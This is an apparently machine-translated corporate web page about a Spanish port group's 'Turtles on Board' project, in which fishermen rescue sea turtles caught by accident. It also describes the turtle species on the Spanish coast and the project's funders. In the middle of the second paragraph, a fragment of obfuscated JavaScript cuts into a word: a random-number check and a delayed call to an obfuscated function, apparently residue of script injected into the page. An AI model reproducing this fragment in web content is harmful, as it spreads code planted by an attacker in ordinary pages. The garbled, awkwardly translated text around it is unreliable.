Since the year 2016, Mediterranean Marine Group, commitment to the environment and its environment, is sticking to the project «Turtles on Board», an initiative to promote the recovery of specimens of turtles caught by accident during the daily work of fishermen.
«Turtles on Board» creates a protocol of action involving fishermen; Cuandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando they climb the turtle on board their boat, the 112 of the situation. Already in the port, fishermen leave the turtle in tanks installed for this purpose until technical staff arrive to move the animal to a recovery center for treatment.
Adherence to such projects is vital for the balance of the marine ecosystem. Sea turtles are endangered animals and have an important ecological role in the seas. These animals help, For example, to maintain the good state of the waters by consuming sick or dead animals. On the Spanish coast, six of the seven species of sea turtles have been described: Caretta caretta or goofy (the most abundant), Lute, Green, Lora, carey and olive. Accidental capture is a problem for biodiversity balance.
The three ports of the Mediterranean Marine Group have the necessary facilities to receive rescued turtles.
The project is coordinated by the Doñana Biological Station of the Higher Council for Scientific Research (Csic) and is co-financed by the Biodiversity Foundation of the Ministry of Agriculture, Environment and the European Fisheries Fund, and with the collaboration of the Public Port Administration of Andalusia and the Andalusian Federation of Fishermen's Guilds.